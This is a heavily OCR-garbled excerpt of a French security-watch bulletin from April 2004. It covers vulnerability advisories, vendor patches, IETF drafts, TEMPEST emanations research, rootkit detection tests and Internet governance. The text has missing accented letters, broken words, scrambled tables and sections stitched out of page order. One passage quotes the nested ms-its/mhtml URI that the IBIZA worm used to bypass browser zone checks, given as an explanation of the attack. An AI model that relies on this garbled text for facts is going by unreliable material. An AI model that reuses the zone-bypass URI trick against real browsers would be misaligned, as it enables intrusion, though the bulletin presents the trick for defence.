Home

Veille Technologique Sécurité

image

Contents

1. Un code d exploitation pour le d bordement de buffer affectant l utilitaire de compression winzip lors du traitement d une archive MIME a t publi II permet d ex cuter un code arbitraire au travers d une archive malform e http www securiteam com exploits 5 NPOE2ACKC htmI BULLETINS ET NOTES Les bulletins d information suivants ont t publi s par les organismes officiels de surveillance et les diteurs Compl ment d informations sur la vuln rabilit TCP eEye a publi un compl ment d informations au sujet de la vuln rabilit affectant plusieurs produits Symantec lors du traitement des paquets TCP Le pilote SYMNDIS SYS est vuln rable lorsque l option TCP SACK ou Alternate Checksum Data est suivie d une longueur nulle II en r sulte une boucle infinie provoquant un d ni de service du syst me Une exploitation est possible m me si le port cibl n est pas ouvert et que le pare feu ou le syst me de d tection d intrusion est activ Veille Technologique S curit N 69 Page 54 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 Apogi ATTAQUES OUTILS Description A l occasion de la conf rence BlackHat s tant tenue en ao t 2003 Jan Rutkowski pr sentait les r sultats d une excellente quoique tr s technique tude des diff rents proc d s susceptibles d tre utilis s pour
2. Saut de r pertoire possible dans le serveur Une deuxi me vuln rabilit a t signal e depuis l alerte mise dans le bulletin pr c dent Elle permet la lecture distance de n importe quel fichier accessible par le serveur CVS Cela ne fait pas l objet d une nouvelle alerte car cette vuln rabilit est corrig e elle aussi par la derni re version de cvs qu il faut donc d ployer sur les serveurs http ccvs cvshome org servlets NewsltemView news D 102 mra m ra r F RI EI LD a 2L Disponibilit de plusieurs correctifs FreeBSD annonce la disponibilit des correctifs corrigeant les vuln rabilit s pr sentes dans les paquetages ipv6 FreeBSD SA 04 06 chroot FreeBSD SA 04 07 Veille Technologique S curit N 69 Page 48 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 Correctif pour F Secure Anti Virus pour MIMESweeper F Secure annonc la disponibilit d un correctif pour F Secure Anti Virus pour MIMESweeper versions 5 41 et 5 42 Un probl me non document peut conduire ne pas d tecter le virus Sober D s il est inclus dans une archive au format zip http support f secure com enu corporate downloads hotfixes av mimesweeper hotfixes shtml In HP R vision du bulletin HPSBUX0303 252 HP a r vis le bulletin HPSBUX0303 252 afin d annoncer la disponibilit
3. NAI McAFEE Forte 23 04 NA McAfee ePolicy Orchestrator OOOO SS y yS ntpy dounios narcom produets patches POI D EPOOA NE O NAI McAfee http download nai com products patches ePO v2 x Patch14 txt CAN 2004 0038 Obtention de privil S Une vuln rabilit dans eDirectory autorise un utilisateur authentifi obtenir des droits privil gi s Forte 28 04 Novell eDirectory 8 7 Palliatif propos Role Based Services RBS Mauvais positionnement des droits Novell 10092504 http support novell com cgi bin search tidfinder 10092504 Acc s non autoris la configuration de BorderManager II est localement possible de reconfigurer Novell BorderManager et d acc der aux fichiers de journalisation sans authentification Forte 07 04 Novell NetWare 5 1 6 et 6 5 BorderManager 3 7 et 3 8 Correctif existant Outils d administration Novell 2967805 http support novell com cgi bin search tidfinder 2967805 Veille Technologique S curit N 69 Page 39 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 Cross Site Scripti dans NetWare Enterprise Server D bordement de buffer dans les lecteurs multim dia Un d bordement de buffer exploitable distance affecte les lecteurs multim dia de Real Networks 07 04 Real Networks RealPlayer 8 RealOne Player RealOne Player v2 pour Windows R
4. 50 20 10 02 fhttp www packetfactory net firewalk O O y y O IPSend Pequetts lP 21 19 09 97 tp coombs anu edu au pub net misc O Z O Z O Z O O DrawBridge PareFeu FreeBsd 19 04 00 lhttp drawbridge tamu edu IpFilter Filtre datagramme 11 03 04 http coombs anu edu au ipfilter ip filter html INetFilter IpTables 02 11 03 http www netfilter org downloads html TUNNELS N oncti ate urc 7 FreeSwan PilelPSec 06 22 04 04 Erreur Signet non d fini http tunnel Encapsuletion http 3 0 5 06 12 00 nttp www nocrew org software httptunnel html OpenSSL 0 9 7d 17 03 04 http www openssl org 7 OpenSSH file SSH 1et2 8 8 101 19 04 04 http www openssh com Stunnel Proxyhttps 405 14 02 03 http www stunnel org 0 0 0 O Zebedee Tunnel TCP UDP 29 05 02 http www winton org uk zebedee Veille Technologique S curit N 69 Page 23 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 Apogi NORMES ET STANDARDS LES PUBLICATIONS DEL I LES RFC Du 27 03 2003 au 28 04 2004 30 RFC ont t publi s dont 5 RFC ayant trait la s curit RFC TRAITANT DE LA S CURIT eme JALTO L f 04 04 FILTER 3704 03 04 BCP 37
5. Une mauvaise initialisation de la variable d environnement LD LIBRARY PATH affecte Gnome Forte _ 26 03 D bordement de buffer dans l utilitaire shar Un d bordement de buffer permet l ex cution de code arbitraire sous les droits de l utilisateur courant Moyenne 06 04 GNU sharutils versions 4 2 1 et inf rieures D bordement de buffer http www securityfocus com archive 1 359639 D ni de service distant dans I BM Director Une vuln rabilit dans IBM Director peut conduire un d ni de service distant Forte 05 04 IBM Director 3 1 Agent pour Windows Application twgipc exe Non disponible http t3k ibernet com Director31ad html Veille Technologique S curit N 69 Page 41 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 Vuln rabilit dans les impl mentations I Pv4 Plusieurs impl mentations du protocole IPv4 sont vuln rables lors de la gestion des paquets fragment s sp cialement construits Impl mentations du protocole IPv4 Internet Protocol sur Microsoft Windows 2000 Mandrake Linux 9 2 Cisco 2621XM Cisco PIX Firewall Apple Mac OS X 10 2 8 bas sur FreeBSD Aucun correctif Fragmentation protocole IPv4 Mauvaise gestion des paquets fragment s William Ken Hollis http gandalf home digital net Rose rtf http www securityfocus com archive 1 359144 m cc md Un
6. ein ich Connor pie train de g n rer le mod le It seems that pfService has been not started or it is generating statistique qui lui servira de the baseline after system boot Check event log for details r f rence C Program Files pf bin gt pfagentconsole Connexion au service using pipe pipe cmd L analyse de coh rence est performing tests engag e Veille Technologique S curit N 69 Page 55 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 test name current system clear system GENE Processes Sle 100 316 100 0 FindFile 24680 48 24673 56 7 OpenFile 59219 98 59219 68 0 node RER 106 100 106 100 0 recv_null 167 100 167 100 0 RegOpenKey CAN 56 6241 62 10 RegEnumKe y 1412 100 1412 100 0 RegEnumKey null 159 100 159 100 0 Il faut vraisemblablement dort Noces E DC EE C MOIS E comprendre ici CLEAN Your system seems to be CLEAR C Test hxdef hxdef100 noservice Initialisation du rootkit ici Hacker Defense C Program Files pf bin gt pfagentconsole Connexion au service using pipe pipe pf_cmd L analyse de coh rence est performing tests A AP PP AR de nouveau engag e La pr sence du rootkit est test name current system clear system correctement d tect e Processes 389 100 Sle
7. Veille Technologique S curit N 69 Page 10 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 Copie acquise Ecran original den transmission of text a compromising em of video display system can be achieved by am of dither pattern ir the displayed I 7 re mm r image Le rapport de Markus Kuhn pr sente d autres techniques d acquisition proc dant des lois de l optique Une impressionnante d monstration de reconstitution du contenu d un cran par la seule analyse de la luminosit r fl chie par un mur adjacent celui ci vient ainsi tayer ses propos Cette technique n est pas sans rappeler les tous premiers proc d s de transmission d une image distance et notamment le principe dit du disque de Nipkow Nous recommandons la lecture de ce passionnant rapport qui offrira l occasion de se replonger au coeur de la th orie du traitement du signal et des outils math matiques associ s La table des mati res est pr sent e ci apr s 1 Introduction 1 1 Historic background and previous work 1 1 1 Military activities 1 1 2 Open literature 1 2 Motivation and scope 2 Foundations and test equipment 2 1 Antenna types 2 2 Receivers 2 3 Receiver calibration 2 3 1 Impulse bandwidth 2 3 2 Impulse strength 2 4 Signal correlation 3 Analog video displays 3 1 Video signal t
8. 2003 0594 CAN 2004 0191 SYMANTE Correctif OpenSSL pour Clientless VPN Gateway 5 0 Symantec a annonc la disponibilit du correctif pour la vuln rabilit OpenSSL affectant Symantec Clientless VPN Gateway 5 0 s rie 4400 11 corrige une vuln rabilit pouvant conduire un d ni de service ftp ftp symantec com public english us canada products sym clientless vpn sym clientless vpn 5 updates hfl readme txt CAN 2004 0079 VZNAVASBI WM IV WM ES De V IVIVV WW AE Correctifs OpenSSL VMWare a annonc la disponibilit des correctifs pour VMware GSX Server versions 2 5 1 et 3 0 0 corrigeant ainsi de multiples failles dans OpenSSL pouvant conduire un d ni de service Correctifs pour des vuln rabilit s du noyau VMware a annonc la disponibilit des correctifs pour des vuln rabilit s affectant le noyau sur VMware ESX Server Ils corrigent plusieurs failles dans les fonctions do mremap et do brk http www vmware com download esx esx152 7428update html http www vmware com download esx esx20 7483update html http www vmware com download esx esx201 7427update html CODES D EXPLOI TATI ON Les codes d exploitation des vuln rabilit s suivantes ont fait l objet d une large diffusion Une code d exploitation a t publi sur le site de Securiteam Le seul int r t de cet utilitaire r side dans le regroupement d une multitude de codes d exploitatio
9. NOUVEAUX DRAFTS TRAI TANT DE LA S CURI T DNS jdraft gieben resolver application interface 00 20 04 DNSSEC Resolver Interface to Applications IPSEC draft ietf ipsec ciph aes gcm 00 27 04 The Use of Galois Counter Mode GCM in IPsec ESP draft ietf mip6 ro sec 00 26 04 Mobile IPV6 Route Optimization Security Design Background Veille Technologique S curit N 69 Page 24 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 he Er PIM draft ietf mboned mroutesec 00 16 04 PIM SM Multicast Routing Security Issues and Enhancements PPP X jraft lizhiming pppext eap cave 00 15 04 EAP CAVE Authentication RADIUS draft zorn radius logoff 00 7 04 User Session Tracking in RADIUS SIP X Jjdraft smith sip auth examples 00 2 04 Digest Authentication Examples for Session Initiation Protocol raft ietf tcpm tcpsecure 00 20 04 Transmission Control Protocol security considerations MISE J OUR DE DRAFTS TRAITANT DE LA S CURIT Th me Nom du Draft Date Titre AMTP Authenticated Mail Transfer Protocol A Survey of Authentication Mechanisms Extensions to BGP to Support Secure Origin BGP soBGP Cryptographically Generated Addresses CGA N UJ nan O UJ MTP draft weinman amtp 03 6 04 UTH draft iab auth mech 03 d d O BR raft ng sobgp bgp extensions 02 GA RYPTO Ran
10. CAN 2003 0813 CAN 2004 0116 CAN 2003 0807 CAN 2004 0124 Reprise de l avis Microsoft MS04 013 Le CIAC a repris sous la r f rence O 116 l avis Microsoft MS04 013 propos d une vuln rabilit dans Outlook Express permettant l ex cution de code arbitraire http ciac IInl gov ciac bulletins o 116 shtml CAN 2004 0380 Veille Technologique S curit N 69 Page 46 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 Reprise de l avis Microsoft MS04 014 Le CIAC a repris sous la r f rence O 117 l avis Microsoft discutant d un d bordement de buffer exploitable distance dans Microsoft et Database Engine http ciac IInl gov ciac bulletins o 117 shtml CAN 2004 0197 Reprise de l avis HP HPSBMAO1010 Le CIAC a repris sous la r f rence O 118 l avis HP HPSBMAO01010 concernant une vuln rabilit dans OpenView permettant d obtenir un acc s non autoris http ciac Ilnl gov ciac bulletins o 118 shtml Reprise de l avis HP HPSBTUO1012 Le CIAC a repris sous la r f rence O 119 l avis HP HPSBTUO1012 propos de deux vuln rabilit s exploitables distance affectant le serveur WU FTPD sur Tru64 UNIX Reprise de l avis HP HPSBPI 01007 Le CIAC a repris sous la r f rence O 120 l avis HP HPSBPIO1007 discutant de multiples vuln rabilit s dans l interface d administration HP Web J etadmin autorisant un u
11. APOGEE Communications oport de iogique 5 x Les informations fournies dans ce document ont t collect es et compil es partir de sources d origines diverses et publiquement accessibles mailing lists newsgroups sites Web Ces informations sont fournies pour ce qu elles valent sans garantie d aucune sorte vis vis de l exactitude de la pr cision ou de la qualit de l information Les URL associ es certains th mes sont valid es la date de la r daction du document Les symboles d avertissement suivants seront ventuellement utilis s Site dont la consultation est susceptible de g n rer directement ou indirectement une attaque sur l quipement de consultation voire de faire encourir un risque sur le syst me d information associ Site susceptible d h berger des informations ou des programmes dont l utilisation est r pr hensible au titre de la Loi Francaise Aucune garantie ne peut tre apport e sur l innocuit de ces sites et en particulier sur la qualit des applets et autres ressources pr sent es au navigateur WEB La diffusion de ce document est restreinte aux clients des services VTS RAPPORT et VTS ENTREPRISE Les marques et les produits cit s dans ce rapport sont la propri t des d positaires respectifs APOGEE Communications Pour tous renseignements 15 Avenue du Cap Horn Offre de veille http www apogee com fr veille ZA de Courtaboeuf Informations vts info apoge
12. dans le protocole TCP produits Cisco impl mentant une pile TCP sont potentiellement des attaques par d ni de service Critique 20 04 Cisco produits bas sur IOS IOS Firewall et 105 Correctif existant Impl mentation Vuln rabilit dans le protocole TCP http www cisco com warp public 707 cisco sa 20040420 tcp ios shtml http www cisco com warp public 707 cisco sa 20040420 tcp nonios shtml Acc s non autoris aux dispositifs WLSE et HSE L existence d un compte cod en dur permet d acc der aux dispositifs Cisco WLSE et HSE Forte 07 04 Cisco Wireless LAN Solution Engine 2 0 2 0 2 et 2 5 Hosting Solution Engine 1 7 1 7 1 1 7 2 et 1 7 3 Le module VPN Services ne traite pas correctement les paquets IKE malform s g n rant ainsi un d ni de service Forte 08 04 Cisco 105 12 2 avec module VPNSM sur les quipements Catalyst s rie 6500 Routeurs s rie 7600 _ Mauvaise gestion des requ tes SNMP sur lOS Cisco lOS ne bas correctement certaines requ tes SNMP et peut conduire un d ni de service Forte 20 04 Cisco 105 12 05 12 1E 12 2 12 25 12 3 12 3B et 12 3T Correctif existant Cisco 105 Mauvaise gestion des requ tes SNMP Cisco 50980 http www cisco com warp public 707 cisco sa 20040420 snmp shtml CERT TAOA4 111B http www us cert gov cas techalerts TAO4 111B html al ia a u C y E Lun A Exposition d informations sensibles Les mots de passe s
13. http lists debian org debian security announce debian security announce 2004 msg00084 html CAN 2004 0156 Vuln rabilit dans la biblioth c Une vuln rabilit dans la biblioth que pam pgsql peut autoriser un utilisateur distant malveillant ex cuter des requ tes SQL arbitraires Forte 29 03 Debian linux 3 0 woody Correctif existant Module libpam psql Mauvaise gestion des param tres d entr e DSA 469 1 http www debian org security 2004 dsa 469 CAN 2004 0366 Forte 03 04 Debian Linux 3 0 woody OCO SSS Forte 03 04 Debian Linux 3 0 woody _ DSA 473 1 http www debian org security 2004 dsa 473 CAN 2004 0376 D bordement de buffer dans ident2 Le paquetage ident2 est sensible un d bordement de buffer Forte 21 04 Correctif existant Fonction child service D bordement de buffer DSA 494 1 http lists debian org debian security announce debian security announce 2004 msg00094 html CAN 2004 0408 Forte 21 04 Debian Linux 3 0 WG T DSA 493 1 http www debian org security 2004 dsa 493 CAN 2004 0409 Ecrasement des fichiers arbitraires via xine ui xine cr des fichiers temporaires de mani re non s curis e pouvant conduire l crasement de fichiers arbitraires Moyenne 06 04 Debian Linux 3 0 woody Correctif existant xine bugreport ou xine check Cr ation non s curis e de fichiers temporaires DSA 477 1 http www debian org security 2
14. 100 T3 FindFile 38357 66 23918 94 14439 OpenFile 28708 60 14272 99 14436 106 100 106 100 0 recv_null 233 100 167 100 66 RegOpenKey CAEN 9807 6129 98 Se RegEnumKey 20121 91 ISTOT 00 18811 RegEnumKey_null 159 100 159 100 0 Your system seems to COMPROMISED Les tests que nous avons pu effectuer avec plusieurs autres rootkits justifient l int r t de l approche tout en mettant aussi en vidence ses limitations notamment vis vis de la derni re version disponible de fu qui n est pas d tect e 11 nous faudra cependant tre honn tes ce test ci tait biais Les proc d s utilis s par fu ne provoquent en effet aucune modification des structures de r f rence utilis es par l utilitaire de d tection PatchFinder et le rendent en cons quence ind tectable Seule une approche pr ventive sera dans ce cas efficace Elle consistera surveiller voire verrouiller l acc s aux facilit s offertes par le noyau de Windows pour charger dynamiquement une librairie dynamique et ins rer celle ci dans la cha ne des traitements un proc d d nomm hooking o cha nage dans le jargon C est l approche retenue par diff rents produits de pr vention dont ProcessGuard Compl ment d information http www rootkit comy vault joanna patchfinder w2k 2 11 zip Utilitaire PatchFinder http www diamondcs com au processguard index php page attack
15. 11 Proc dure d alimentation d indicateur 12 Proc dure d alimentation de tableau de bord SSI 13 Charges de travail et co ts r currents Veille Technologique S curit N 69 Page 16 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 14 Formulaire de recueil de commentaires Compl ment d information http www ssi gouv fr fr confiance tdbssi html Guide TDBSSI NI ST ETAT DES GUI DES DE LA SERIE SP800 Description La publication pour commentaire de la seconde version du guide SP800 60 Guide for Mapping Types of Information and Information Systems to Security Categories nous am ne proposer une mise jour du tableau r capitulatif des publications r centes de la s rie sp ciale SP800 ISP800 26 ISecurit Self Assessment Guide for Information Technology Systems 11 2001 800 27 Engineering Principles for Information Technology Security Rev R 01 2004 SP800 30 Underlying Technical Models for Information Technology Security Rev A JER 01 2004 SP800 31 intrusion Detection Systems F 11 2001 SP800 34 Contingency Planning Guide for Information Technology Systems SP800 35 Guide to Selecting Security Products O O Z SP800 36 Guide IT Security Services 10 2003 SP800 37 Guidelines for the Security C amp A of Federal Informat
16. APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 Correctif cumulatif 10067 SGI a annonc la disponibilit du correctif cumulatif 10067 pour SGI ProPack v2 3 et v2 4 Il corrige de multiples vuln rabilit s dans les paquetages cadaver mailman squid et CVS ftp patches sgi com support free security advisories 20040404 01 U asc CAN 2004 0179 CAN 2004 0182 CAN 2004 0189 CAN 2004 0180 CAN 2004 0405 SGI a annonc la disponibilit du correctif noyau 10065 pour SGI ProPack v2 4 corrigeant ainsi deux vuln rabilit s autorisant l ex cution de code arbitraire et l exposition d informations sensibles http www securityfocus com archive 1 361601 2004 04 24 2004 04 30 0 CAN 2004 0109 CAN 2004 0133 Correctifs pour les pilotes de cartes Ethernet SGI a annonc que les interfaces r seau gXX tgXX et efXX sur IRIX ne sont pas vuln rables D anciennes interfaces sont potentiellement vuln rables mais ne sont plus g r es en maintenance http www auscert org au render html it23989 amp cid 1 CAN 2003 0001 Correctif pour Ethereal et Mozilla a SGI a annonc la disponibilit du correctif 10064 pour les paquetages Ethereal et Mozilla sur SGI ProPack versions 2 3 et 2 4 ftp patches sgi com support free security advisories 20040402 01 U asc CAN 2004 0176 CAN 2004 0365 CAN 2004 0367 CAN 2003 0564
17. Europe 108 3 144 4 175 7 196 2 Total monde 384 498 7 555 7 633 6 196 3 60 6 13i 235 8 221 1 724 9 Am rique latine Asie Pacifique Source eMarkatar International Telecom Union Mis jour de IB 05 2003 Veille Technologique S curit N 69 APOGEE Communications Tous droits r serv s Page 19 64 Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 T l communications UIT C est ainsi que s est tenu Gen ve les 10 11 et 12 d cembre 2003 la premi re phase du Sommet Ce dernier a abord la probl matique globale de la gestion de l Internet en r unissant institutionnels et industriels mais aussi pour la premi re fois des repr sentants de la soci t civile Deux textes ont t adopt s une d claration de principe et un plan d action Ces deux documents fruits d un consensus t nu 176 pays repr sent s n ont h las pas permis d aboutir aux r sultats concrets et rapidement applicables esp r s par les organisateurs 11 est ainsi rapidement apparu que les th mes dans un premier temps consid r s comme secondaires de la d centralisation de la gestion des noms et la prise en compte de langues nationales face la main mise de la langue anglo saxonne devaient tre prioritairement trait s On retiendra par ailleurs la d cision de former dans le cadre de l ONU un groupe de travail charg de d gager des propositions pour la ges
18. rifier que toutes les conditions susceptibles d influencer le fonctionnement du protocole ont bien t prises en compte et plus pr cis ment que les automates d tat d crivant les actions devant tre engag es par les entit s en communication sont coh rents entre eux Trop souvent ignor e ou insuffisamment pr par e cette tape conduit impl menter des protocoles d change sp cifi s sur la base d une r gle pernicieuse chacun des intervenants de l change est consid r responsable de la coh rence des l ments protocolaires transmis Elev e au rang de dogme en environnement TCP IP car simplifiant les impl mentations en les d barrassant de toute la logique de v rification cette r gle a conduit rendre les protocoles ainsi con us extr mement vuln rables en environnement ouvert L erreur est g n ralement difficilement r cup rable car enracin e dans la d finition m me du protocole La corriger conduit inexorablement complexifier l impl mentation et par cons quent une perte de performance significative Le protocole perd alors g n ralement tout son attrait la suite de cette refonte La pile TCP I P impl ment e dans les tous premiers syst mes Windows avait ainsi la r putation d tre l une des plus performantes du march sans pour autant sacrifier la conformit aux sp cifications sp cifications dont on rappellera qu elles n imposent que peu de contraintes sur la validation des l ments p
19. sp cialiste reconnu du domaine aborde ici par le d tail un sujet tr s sensible objet de travaux confidentiels et d une norme dite TEMPEST encore partiellement classifi e Les lois de l lectromagn tisme nous apprennent que tout conducteur lectrique se comportera comme une antenne rayonnant la composante non continue du signal transmis dans ce conducteur En d autres termes et appliqu es l lectronique ces lois conduisent devoir consid rer tout quipement comme un metteur potentiel transmettant sur un large spectre un m lange de tous les signaux modul s circulant ou produits par l quipement horloge locale du processeur signaux du bus d adresse du bus donn es Afin de limiter l impact de ces transmissions radiofr quence ind sirables de nombreuses normes Nationales ou Internationales sp cifient les valeurs maximales admissibles des champs rayonn s conduisant les constructeurs filtrer les entr es sorties des quipements liaisons d interconnexion lignes d alimentation mais aussi blinder efficacement tout ou partie des quipements Nos lecteurs se souviendront tr s certainement des modifications impos es par les normes CE sur les quipements informatiques et en particulier sur la finition des coffrets de ceux ci dont la pr sence de peignes de mise la masse destin s renforcer le blindage et de ferrites de filtrage sur les c bles de raccordement des crans Toutes ces mesures ont con
20. t ve aas heec s est notamment fait connaitre par son syst me d analyse et de x d tection d anomalies SecureSphere Ce syst me innovant i AM _ fonctionne par corr lation entre des informations produites par la NT d sonde plac e en amont assurant la surveillance du trafic HTTP et PS la sonde positionn e en aval de l application WEB de m diation dii M i ds r HM charg e d acqu rir les requ tes SQL g n r es Dg Deux tudes fort int ressantes ont derni rement t publi es par XE le d partement R amp D de cette soci t l une portant sur les vers et i CI autres codes mobiles la seconde sur les techniques permettant te de passer travers les m canismes de protection contre les attaques de type injection de code SQL Ce terme barbare d signe la technique d attaque la plus utilis e si ce n est la plus efficace lorsqu il s agit d acqu rir des informations sensibles h berg es dans des bases de donn es coupl es des applications WEB publiquement Veille Technologique S curit N 69 Page 62 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 accessibles voire m me de prendre le contr le de ces derni res Un tableau fort int ressant pr sentant les r sultats de plus de 300 tests Vuln rabilit d intrusion men s par la soci t Imperva sur plus de q
21. 0663 CAN 2003 0719 CAN 2003 0806 CAN 2003 0906 CAN 2003 0907 CAN 2003 0908 CAN 2003 0909 CAN 2003 0910 CAN 2004 0117 CAN 2004 0118 CAN 2004 0119 CAN 2004 0120 CAN 2004 0123 Multiples vuln rabilit s dans Microsoft RPC DCOM De multiples vuln rabilit s affectent les composants des services RPC et DCOM autorisant ainsi des d nis de service l x cution de code arbitraire ou l ouverture non autoris e de ports de communication 13 04 Microsoft Windows NT 4 0 SP6a NT 4 0 SP6 Terminal Server Edition 2000 SP2 SP4 toutes versions XP 32 bits XP 32 bits SP1 XP 32 bits Edition 2003 XP 64 bits SP1 Server 2003 32 et 64 bits 98 et ME Correctif existant Biblioth que RPC Runtime Conflit d acc s Service RPCSS Mauvaise gestion de messages corrompus Modules CIS et RPC HTTP Erreur de conception Identifiants d objets COM MS04 012 http Wwww microsoft com technet security bulletin MS04 012 mspx CAN 2003 0813 CAN 2004 0116 CAN 2003 0807 CAN 2004 0124 Veille Technologique S curit N 69 Page 38 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 Vuln rabilit dans le gestionnaire des partages r seau Une vuln rabilit existe lorsque le gestionnaire des partages r seau acc de un partage dont le nom est trop long Forte 27 04 Microsoft Windows 98 Me NT 2000 et XP Correctif exist
22. Internet dans le cas d un document extrait d un fichier d aide distant On voit poindre ici un probl me potentiel dans la d finition du concept de zone pour des documents complexes trait s par une succession de gestionnaires de protocole Ce concept n cessite en effet de pouvoir tracer la zone d origine du document initial travers toutes les manipulations interm diaires et ce sans jamais devoir s appuyer sur une information manipulable par un tiers Ici les imbrications des sch mas et les sp cificit s des traitements associ s chacun d eux conduit le navigateur voire m me certains de ces gestionnaires consid rer qu il travaille sur une r f rence locale quand bien m me le document proviendrait d un site tiers distant Dans le cas ici tudi le gestionnaire ms its est induit en erreur par la pr sence de la r f rence locale file c ifoo mhtml quand en pratique c est une r f rence distante qui est acc d e par le biais de la redirection effectu e par le gestionnaire mhtml Ce probl me est illustr ci dessous par l URI utilis e par le ver IBIZA ms its mhtml file c ifoo mhtml http www site com foo chm launch html Sch ma ms its Sch ma mhtm l file c foo mhtml R f rence locale inexistante redirection implicite et masqu e http www site com foo chm launch html sur une r f rence distante ms its ne voit que la 1 r f Nous assistons la naissance d une
23. Protocol draft ietf crisp iris beep 06 LSP draft caviglia mp2cp amp cp2mp 00 15 04 IGRSVP TE signaling extension to move Management created LSP draft klyne hdrreg mail 04 raft jones avt audio t38 04 draft deng mip6 ha loadbalance 01 draft jfaizan mipv6 vhar 02 Veille Technologique S curit N 69 Page 26 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 MSGHEAD draft newman msgheader originfo 05 28 05 lOriginator Info Message Header OSPF Multi Area Adjacency 1 11 draft ietf ospf te node addr 00 26 04 4 04 A model for IETF Process Experiments PWE3 draft ietf pwe3 sonet 05 26 04 SONET SDH Circuit Emulation over Packet CEP draft ietf pwe3 ethernet encap 06 20 04 Methods for Transport of Ethernet Frames Over IP MPLS Networks draft ietf pwe3 atm encap 05 20 04 Methods for Transport of ATM Cells Frame Over IP and MPLS Net draft ietf pwe3 iana allocation 04 1 19 04 ANA Allocations for pseudo Wire Edge to Edge Emulation PWE3 draft ietf pwe3 hdlc ppp encap mpls 03 21 04 Methods for Transport of PPP HDLC Over IP and MPLS Networks RFC1738 raft hoffman rfcl738bis 02 120 04 Definitions of Early URI Schemes IRFC3454 draft hoffman rfc3454bis 02 14 04 Preparation of Internationalized Strings stringprep IRFC3490 draft hoffman rfc3490bis 02 14 04 Internationali
24. Public Key Cryptography for Initial Authentication in Kerberos L N wo ololololo N BR UJ II O JEJEJEJE m O c m Z draft ietf sasl rfc2222bis 07 1 03 Simple Authentication and Security Layer SASL draft ietf smime rfc3369bis 03 20 04 Cryptographic Message Syntax CMS TLS draft friend tls Izs compression 03 14 04 Transport Layer Security Protocol Compression Using LZS draft ietf tls rfC2246 bis 06 31 03 The TLS Protocol Version 1 1 ML draft marshall security audit 09 23 04 Security Aud amp Access Acc Msg XML Data Def for Healthcare Ap DRAFTS TRAI TANT DE DOMAI NES CONNEXES LA S CURI T Th me Nom du Draft Date Titr draft ietf aaa diameter mobileip 17 15 04 draft ietf dhc dhcpv6 ctep opt 01 raft daniel dhc ipv6in4 opt 03 raft daniel dhc dhcpv4 tep conf 00 draft savola v6ops tunneling 01 raft durand v6ops assisted tunneling req 00 raft palet v6ops tun auto disc 00 16 0 SATAP 19 0 2TP DAP raft ietf Idapbis protocol 23 9 0 MAC __ draft xie rserpool redundancy model 02 114 04 RSERPOOL Redundancy model Policy draft ietf I3vpn gre ip 2547 02 14 04 Use of GRE or IP in BGP MPLS IP VPNs XCON draft ietf xcon cpcp reqs 03 26 04 Requirements for Conference Policy Control Protocol AUTRES DRAFTS N pu san CE du Draft ADSL draft abel vb
25. Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 Le mot de la r daction En France et dans le domaine particulier de la s curit des syst mes d information le mois d avril aura t riche en actualit s Deux lois ont t adopt es par le S nat la loi pour la confiance dans l conomie num rique adopt e en seconde lecture le 8 avril apres une refonte cons quente du texte initial et en urgence d clar e le 15 avril la loi pour les communications lectroniques portant modification du code des Postes et T l communications Deux guides ont t publi s par le DCSSI le guide PSSI la r vision tant attendue du guide PSI publi en 1994 et le guide TDBSSI traitant des tableaux de bord des syst mes d information L actualit internationale n est pas en reste avec la publication de tr s nombreux articles touchant tous les domaines de la s curit parmi lesquels trois articles dont nous recommandons la lecture Dans un article intitul Google covets your email address le site google watch org laisse entendre que le service gratuit de messagerie G Mail ouvert ce mois ci par Google pourrait bien servir d autres int r ts que ceux des usagers http www google watch org email html Le site News com publie une excellente synth se des risques inh rents l adoption grandissante du standard XML et des protocoles associ
26. certains codes malicieux dits virus compagnons tiraient parti de l ambiguit li e au concept d extension Pour m moire ceux ci exploitaient la r gle de d cision visant d terminer en environnement console le programme devant tre ex cut lorsque plusieurs programmes ayant le m me nom mais portant une extension diff rente taient trouv s dans les r pertoires de recherche La priorit tant donn e l extension com puis l extension exe et enfin bat il tait possible d ins rer un Veille Technologique S curit N 69 Page 18 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 programme tiers portant le nom d une application connue mais dot d une extension en com dans le but de faire ex cuter celui ci en lieu et place de l application officielle Mais cela est une histoire ancienne quoique Compl ment d information http www uniras gov uk I1 12 13 tech reports NTNO304 pdf http www uniras gov uk I1 12 13 tech reports NTNO204 pdf http www uniras gov uk 11 12 13 tech_reports NTNO104 pdf Sur les codes malicieux Sur les techniques de r duction du SPAM Sur l augmentation du nombre de chevaux de Troie LA LEGI SLATI ON INTERNET GOUVERNANCE DE L I NTERNET Description En 1990 le r seau Arpanet devient l Internet On 